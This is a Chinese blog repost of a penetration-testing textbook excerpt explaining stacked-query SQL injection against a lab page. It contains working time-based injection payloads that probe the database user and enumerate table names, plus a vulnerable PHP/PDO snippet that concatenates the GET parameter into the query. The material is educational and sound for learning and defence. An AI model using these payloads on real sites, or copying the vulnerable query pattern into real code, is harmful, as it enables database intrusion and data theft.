• 最新堆叠查询注入攻击和注入代码分析技术


    点击星标,即时接收最新推文

    8bedb23300f34bae6c7bd4c3ed25ec7e.png

    本文选自《web安全攻防渗透测试实战指南(第2版)》

    点击图片五折购书

    cec24d311a215f7ad4987231a20091bf.gif

    堆叠查询注入攻击

    堆叠查询注入攻击的测试地址在本书第2章。

    堆叠查询可以执行多条语句,多语句之间以分号隔开。堆叠查询注入就是利用这个特点,在第二个SQL语句中构造自己要执行的语句。首先访问id=1',页面返回MySQL错误,再访问id=1'%23,页面返回正常结果。这里可以使用Boolean注入、时间注入,也可以使用另一种注入方式——堆叠注入。

    堆叠查询注入的语句如下:

    ';select if(substr(user(),1,1)='r',sleep(3),1)%23

    从堆叠查询注入语句中可以看到,第二条SQL语句

    select if(substr(user(),1,1)='r', sleep(3),1)%23)

    就是时间注入的语句,执行结果如图4-43所示。

    6b1594083e2fa810d9fb93466617b937.jpeg

    图4-43  

    后面获取数据的操作与时间注入的一样,通过构造不同的时间注入语句,可以得到完整的数据库的库名、表名、字段名和具体数据。执行以下语句,就可以获取数据库的表名。

    ';select if(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='u',sleep(3),1)%23

    结果如图4-44所示。

    07d6e808d3adb6b64adeb481ff9df630.jpeg

    图4-44  

    b67cd15dd84caaec8217be2e00d80c6b.gif

    堆叠查询注入代码分析

    在堆叠查询注入页面,程序获取GET参数ID,使用PDO的方式进行数据查询,但仍然将参数ID拼接到查询语句中,导致PDO没起到预编译的效果,程序仍然存在SQL注入漏洞,代码如下:

    1. try {
    2. $conn = new PDO("mysql:host=localhost;dbname=test", "root", "123456");
    3. $conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    4. $stmt = $conn->query("SELECT * FROM users where `id` = '" . $_GET['id'] . "'");
    5. $result = $stmt->setFetchMode(PDO::FETCH_ASSOC);
    6. foreach($stmt->fetchAll() as $k=>$v) {
    7. foreach ($v as $key => $value) {
    8. if($key == 'username'){
    9. echo 'username : ' . $value;
    10. }
    11. }
    12. }
    13. $dsn = null;
    14. }
    15. catch(PDOException $e)
    16. {
    17. echo "error";
    18. }
    19. $conn = null;
    20. ?>

    使用PDO执行SQL语句时,可以执行多语句,不过这样通常不能直接得到注入结果,因为PDO只会返回第一条SQL语句执行的结果,所以在第二条语句中可以用update语句更新数据或者使用时间注入获取数据。访问dd.php?id=1';select if(ord(substring (user(),1,1))=114,sleep(3),1);%23时,执行的SQL语句如下:

    SELECT * FROM users where `id` = '1';select if(ord(substring(user(),1,1))=114,sleep (3),1);#

    此时,SQL语句分为两条,第一条为

    SELECT * FROM users where `id` = '1'

    是代码自己的select查询;

    select if(ord(substring(user(),1,1))=114,sleep(3),1);#

    则是我们构造的时间注入的语句。

    e204190f9729ff36387210a5e134737d.gif

    MS08067安全实验室视频号已上线

    欢迎各位同学关注转发~

    —  实验室旗下直播培训课程  —

    7f16cae267b1edc14477dbb43a77ab31.png

    f77458d248db83453abd52ee638f46f2.jpeg

    babcd2645d0cd79c1c3103f25394ae66.jpeg4dcea25a2c317f48f058678793369882.png

    03e39afcf7a35dae90e822c43dabb27b.jpeg

    bcbe5d822a453e1f7ab1127d9b28a7c7.jpeg

    e32ec8d7bf81a2d99296586056339b2c.jpeg

    995dde365bfc84d8f6ac5f08806c795a.jpeg

    5f263a90a33d28cfe6ce2afaa77f0800.jpeg


    和20000+位同学加入MS08067一起学习

    c35e4355248c85a6d2224bcb895e5a8e.gif

  • 相关阅读:
    java计算机毕业设计公司薪酬管理系统源码+mysql数据库+系统+lw文档+部署
    2022-08-29 C++并发编程(十六)
    Mybatis 缓存原理
    适用于Linux的Windows子系统(系统安装步骤)
    C++:Stack和Queue的模拟实现
    计算机网络4小时速成:传输层,功能,UDP协议,TCP协议,三次握手,传输数据,四次握手,超时重传,流量控制
    Java8方法引用和Lambda表达式实例源码+笔记分享
    EasyClick java插件项目和混合工程未找到编译后的目录
    数据可视化(python)----中国近十年就业GDP对比
    如何利用项目管理软件精准把控项目进度
  • 原文地址:https://blog.csdn.net/shuteer_xu/article/details/133286175